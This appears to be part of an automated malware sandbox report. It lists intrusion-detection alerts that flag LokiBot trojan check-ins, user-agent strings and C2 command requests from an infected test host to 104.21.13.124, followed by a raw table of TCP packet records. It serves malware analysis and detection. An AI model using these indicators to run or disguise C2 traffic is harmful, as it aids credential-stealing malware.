04/03/24-06:38:19.372255	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49808	80	192.168.2.4	104.21.13.124
04/03/24-06:38:46.856471	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49842	80	192.168.2.4	104.21.13.124
04/03/24-06:38:25.036535	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49814	80	192.168.2.4	104.21.13.124
04/03/24-06:37:25.030663	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.4	104.21.13.124
04/03/24-06:38:46.856471	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49842	80	192.168.2.4	104.21.13.124
04/03/24-06:38:14.340654	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49801	80	192.168.2.4	104.21.13.124
04/03/24-06:38:25.036535	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49814	80	192.168.2.4	104.21.13.124
04/03/24-06:38:14.340654	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49801	80	192.168.2.4	104.21.13.124
04/03/24-06:38:42.416972	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49836	80	192.168.2.4	104.21.13.124
04/03/24-06:37:40.804238	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49759	80	192.168.2.4	104.21.13.124
04/03/24-06:38:20.890742	TCP	2025381	ET TROJAN LokiBot Checkin	49810	80	192.168.2.4	104.21.13.124
04/03/24-06:37:30.613047	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49746	80	192.168.2.4	104.21.13.124
04/03/24-06:38:10.724952	TCP	2025381	ET TROJAN LokiBot Checkin	49796	80	192.168.2.4	104.21.13.124
04/03/24-06:38:50.437190	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49847	80	192.168.2.4	104.21.13.124
04/03/24-06:37:39.122189	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49757	80	192.168.2.4	104.21.13.124
04/03/24-06:38:37.732709	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49832	80	192.168.2.4	104.21.13.124
04/03/24-06:38:43.957176	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49838	80	192.168.2.4	104.21.13.124
04/03/24-06:38:47.687505	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49843	80	192.168.2.4	104.21.13.124
04/03/24-06:38:38.419517	TCP	2025381	ET TROJAN LokiBot Checkin	49833	80	192.168.2.4	104.21.13.124
04/03/24-06:38:05.256073	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49789	80	192.168.2.4	104.21.13.124
04/03/24-06:38:05.256073	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49789	80	192.168.2.4	104.21.13.124
04/03/24-06:37:53.598973	TCP	2025381	ET TROJAN LokiBot Checkin	49775	80	192.168.2.4	104.21.13.124
04/03/24-06:37:50.546988	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49770	80	192.168.2.4	104.21.13.124
04/03/24-06:38:37.732709	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49832	80	192.168.2.4	104.21.13.124
04/03/24-06:38:50.437190	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49847	80	192.168.2.4	104.21.13.124
04/03/24-06:37:42.314099	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49761	80	192.168.2.4	104.21.13.124
04/03/24-06:37:50.546988	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49770	80	192.168.2.4	104.21.13.124
04/03/24-06:38:30.670976	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49822	80	192.168.2.4	104.21.13.124
04/03/24-06:38:18.685116	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49807	80	192.168.2.4	104.21.13.124
04/03/24-06:38:11.400710	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49797	80	192.168.2.4	104.21.13.124
04/03/24-06:38:36.358340	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49830	80	192.168.2.4	104.21.13.124
04/03/24-06:38:29.278543	TCP	2025381	ET TROJAN LokiBot Checkin	49820	80	192.168.2.4	104.21.13.124
04/03/24-06:37:38.407237	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49756	80	192.168.2.4	104.21.13.124
04/03/24-06:38:11.400710	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49797	80	192.168.2.4	104.21.13.124
04/03/24-06:38:39.111241	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49834	80	192.168.2.4	104.21.13.124
04/03/24-06:37:25.764699	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.4	104.21.13.124
04/03/24-06:37:59.640455	TCP	2025381	ET TROJAN LokiBot Checkin	49783	80	192.168.2.4	104.21.13.124
04/03/24-06:38:49.748494	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49846	80	192.168.2.4	104.21.13.124
04/03/24-06:38:17.269664	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49805	80	192.168.2.4	104.21.13.124
04/03/24-06:38:38.419517	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49833	80	192.168.2.4	104.21.13.124
04/03/24-06:38:03.254673	TCP	2025381	ET TROJAN LokiBot Checkin	49788	80	192.168.2.4	104.21.13.124
04/03/24-06:38:16.574818	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49804	80	192.168.2.4	104.21.13.124
04/03/24-06:38:16.574818	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49804	80	192.168.2.4	104.21.13.124
04/03/24-06:37:31.437871	TCP	2025381	ET TROJAN LokiBot Checkin	49747	80	192.168.2.4	104.21.13.124
04/03/24-06:38:39.111241	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49834	80	192.168.2.4	104.21.13.124
04/03/24-06:37:52.772037	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49774	80	192.168.2.4	104.21.13.124
04/03/24-06:37:38.407237	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49756	80	192.168.2.4	104.21.13.124
04/03/24-06:38:40.106892	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49835	80	192.168.2.4	104.21.13.124
04/03/24-06:38:20.198908	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49809	80	192.168.2.4	104.21.13.124
04/03/24-06:38:25.719182	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49815	80	192.168.2.4	104.21.13.124
04/03/24-06:37:55.108965	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49777	80	192.168.2.4	104.21.13.124
04/03/24-06:38:29.987306	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49821	80	192.168.2.4	104.21.13.124
04/03/24-06:37:35.452745	TCP	2025381	ET TROJAN LokiBot Checkin	49752	80	192.168.2.4	104.21.13.124
04/03/24-06:38:34.282252	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49827	80	192.168.2.4	104.21.13.124
04/03/24-06:38:09.892413	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49795	80	192.168.2.4	104.21.13.124
04/03/24-06:38:28.593679	TCP	2025381	ET TROJAN LokiBot Checkin	49819	80	192.168.2.4	104.21.13.124
04/03/24-06:37:47.778229	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49766	80	192.168.2.4	104.21.13.124
04/03/24-06:38:20.198908	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49809	80	192.168.2.4	104.21.13.124
04/03/24-06:38:56.219175	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49855	80	192.168.2.4	104.21.13.124
04/03/24-06:38:34.282252	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49827	80	192.168.2.4	104.21.13.124
04/03/24-06:38:56.219175	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49855	80	192.168.2.4	104.21.13.124
04/03/24-06:38:46.022620	TCP	2025381	ET TROJAN LokiBot Checkin	49841	80	192.168.2.4	104.21.13.124
04/03/24-06:37:47.778229	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49766	80	192.168.2.4	104.21.13.124
04/03/24-06:38:29.987306	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49821	80	192.168.2.4	104.21.13.124
04/03/24-06:38:31.366751	TCP	2025381	ET TROJAN LokiBot Checkin	49823	80	192.168.2.4	104.21.13.124
04/03/24-06:38:09.042243	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49794	80	192.168.2.4	104.21.13.124
04/03/24-06:38:32.914570	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49825	80	192.168.2.4	104.21.13.124
04/03/24-06:37:57.435447	TCP	2025381	ET TROJAN LokiBot Checkin	49780	80	192.168.2.4	104.21.13.124
04/03/24-06:37:32.267354	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49748	80	192.168.2.4	104.21.13.124
04/03/24-06:38:43.265047	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49837	80	192.168.2.4	104.21.13.124
04/03/24-06:37:54.423488	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49776	80	192.168.2.4	104.21.13.124
04/03/24-06:38:56.921190	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49856	80	192.168.2.4	104.21.13.124
04/03/24-06:38:43.265047	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49837	80	192.168.2.4	104.21.13.124
04/03/24-06:37:48.477935	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49767	80	192.168.2.4	104.21.13.124
04/03/24-06:37:58.810149	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49782	80	192.168.2.4	104.21.13.124
04/03/24-06:38:09.042243	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49794	80	192.168.2.4	104.21.13.124
04/03/24-06:37:54.423488	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49776	80	192.168.2.4	104.21.13.124
04/03/24-06:37:49.163901	TCP	2025381	ET TROJAN LokiBot Checkin	49768	80	192.168.2.4	104.21.13.124
04/03/24-06:37:33.093731	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49749	80	192.168.2.4	104.21.13.124
04/03/24-06:37:36.850228	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49754	80	192.168.2.4	104.21.13.124
04/03/24-06:38:25.719182	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49815	80	192.168.2.4	104.21.13.124
04/03/24-06:37:32.267354	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49748	80	192.168.2.4	104.21.13.124
04/03/24-06:38:47.687505	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49843	80	192.168.2.4	104.21.13.124
04/03/24-06:37:41.484457	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49760	80	192.168.2.4	104.21.13.124
04/03/24-06:38:43.957176	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49838	80	192.168.2.4	104.21.13.124
04/03/24-06:37:55.108965	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49777	80	192.168.2.4	104.21.13.124
04/03/24-06:38:52.638175	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49850	80	192.168.2.4	104.21.13.124
04/03/24-06:37:41.484457	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49760	80	192.168.2.4	104.21.13.124
04/03/24-06:37:42.314099	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49761	80	192.168.2.4	104.21.13.124
04/03/24-06:37:43.152524	TCP	2025381	ET TROJAN LokiBot Checkin	49762	80	192.168.2.4	104.21.13.124
04/03/24-06:38:53.324729	TCP	2025381	ET TROJAN LokiBot Checkin	49851	80	192.168.2.4	104.21.13.124
04/03/24-06:37:34.610079	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49751	80	192.168.2.4	104.21.13.124
04/03/24-06:38:08.198877	TCP	2025381	ET TROJAN LokiBot Checkin	49793	80	192.168.2.4	104.21.13.124
04/03/24-06:38:05.938500	TCP	2025381	ET TROJAN LokiBot Checkin	49790	80	192.168.2.4	104.21.13.124
04/03/24-06:38:09.892413	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49795	80	192.168.2.4	104.21.13.124
04/03/24-06:38:56.921190	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49856	80	192.168.2.4	104.21.13.124
04/03/24-06:37:48.477935	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49767	80	192.168.2.4	104.21.13.124
04/03/24-06:38:13.658001	TCP	2025381	ET TROJAN LokiBot Checkin	49800	80	192.168.2.4	104.21.13.124
04/03/24-06:38:32.914570	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49825	80	192.168.2.4	104.21.13.124
04/03/24-06:38:34.982502	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49828	80	192.168.2.4	104.21.13.124
04/03/24-06:37:55.796602	TCP	2025381	ET TROJAN LokiBot Checkin	49778	80	192.168.2.4	104.21.13.124
04/03/24-06:37:45.205065	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49764	80	192.168.2.4	104.21.13.124
04/03/24-06:38:54.842169	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49853	80	192.168.2.4	104.21.13.124
04/03/24-06:38:45.335995	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49840	80	192.168.2.4	104.21.13.124
04/03/24-06:38:34.982502	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49828	80	192.168.2.4	104.21.13.124
04/03/24-06:38:06.650555	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49791	80	192.168.2.4	104.21.13.124
04/03/24-06:37:33.791207	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49750	80	192.168.2.4	104.21.13.124
04/03/24-06:37:45.205065	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49764	80	192.168.2.4	104.21.13.124
04/03/24-06:37:33.791207	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49750	80	192.168.2.4	104.21.13.124
04/03/24-06:37:56.609631	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49779	80	192.168.2.4	104.21.13.124
04/03/24-06:38:35.672062	TCP	2025381	ET TROJAN LokiBot Checkin	49829	80	192.168.2.4	104.21.13.124
04/03/24-06:38:21.763703	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49811	80	192.168.2.4	104.21.13.124
04/03/24-06:38:06.650555	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49791	80	192.168.2.4	104.21.13.124
04/03/24-06:37:34.610079	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49751	80	192.168.2.4	104.21.13.124
04/03/24-06:38:54.009985	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49852	80	192.168.2.4	104.21.13.124
04/03/24-06:38:55.534565	TCP	2025381	ET TROJAN LokiBot Checkin	49854	80	192.168.2.4	104.21.13.124
04/03/24-06:38:23.522239	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49812	80	192.168.2.4	104.21.13.124
04/03/24-06:38:45.335995	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49840	80	192.168.2.4	104.21.13.124
04/03/24-06:38:24.205256	TCP	2025381	ET TROJAN LokiBot Checkin	49813	80	192.168.2.4	104.21.13.124
04/03/24-06:37:46.959263	TCP	2025381	ET TROJAN LokiBot Checkin	49765	80	192.168.2.4	104.21.13.124
04/03/24-06:38:54.009985	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49852	80	192.168.2.4	104.21.13.124
04/03/24-06:37:56.609631	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49779	80	192.168.2.4	104.21.13.124
04/03/24-06:38:07.360242	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49792	80	192.168.2.4	104.21.13.124
04/03/24-06:38:21.763703	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49811	80	192.168.2.4	104.21.13.124
04/03/24-06:38:54.842169	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49853	80	192.168.2.4	104.21.13.124

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 3, 2024 06:37:19.630219936 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:19.630247116 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:19.630342960 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:19.639767885 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:19.639779091 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:19.973088980 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:19.973182917 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:19.973784924 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:19.973870039 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:20.018332005 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:20.018345118 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:20.018548012 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:20.018601894 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:20.022284031 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:20.068231106 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:20.328171015 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:20.328227997 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:20.328237057 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:20.328325987 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:20.328788996 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:20.328833103 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:20.328835011 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:20.328876972 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:20.336894989 CEST	49738	443	192.168.2.4	192.178.50.78
Apr 3, 2024 06:37:20.336913109 CEST	443	49738	192.178.50.78	192.168.2.4
Apr 3, 2024 06:37:20.504983902 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:20.505037069 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:20.505105019 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:20.505392075 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:20.505403996 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:20.901210070 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:20.901360989 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:20.904652119 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:20.904660940 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:20.904967070 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:20.905025005 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:20.905327082 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:20.952234030 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.201174974 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.201256990 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.214027882 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.214102030 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.240245104 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.240320921 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.253343105 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.253400087 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.253413916 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.253463984 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.386235952 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.386291027 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.386312008 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.386353970 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.392611027 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.392652988 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.392659903 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.392700911 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.405772924 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.405817032 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.405930996 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.405972004 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.418922901 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.418972969 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.418992996 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.419033051 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.431987047 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.432034969 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.432044029 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.432089090 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.445111990 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.445166111 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.445174932 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.445214987 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.458242893 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.458292961 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.458300114 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.458342075 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.471388102 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.471472025 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.471481085 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.471528053 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.483268023 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.483340025 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.483347893 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.483392000 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.495235920 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.495289087 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.495297909 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.495342970 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.507127047 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.507194042 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.507199049 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.507235050 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.519031048 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.519107103 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.519129992 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.519181013 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.531008959 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.531074047 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.537781954 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.537838936 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.537846088 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.537892103 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.573141098 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.573220015 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.573501110 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.573549986 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.577817917 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.577871084 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.577878952 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.577925920 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.587837934 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.587923050 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.587929010 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.587979078 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.597429991 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.597486019 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.597492933 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.597543001 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.607955933 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.608025074 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.608030081 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.608074903 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.617644072 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.617695093 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.617712021 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.617717981 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.617741108 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.617786884 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.627187014 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.627244949 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.627249956 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.627298117 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.637662888 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.637736082 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.637825012 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.637872934 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.646492958 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.646569967 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.646615028 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.646667957 CEST	49739	443	192.168.2.4	192.178.50.65
Apr 3, 2024 06:37:22.656142950 CEST	443	49739	192.178.50.65	192.168.2.4
Apr 3, 2024 06:37:22.656213045 CEST	49739	443	192.168.2.4	192.178.50.65
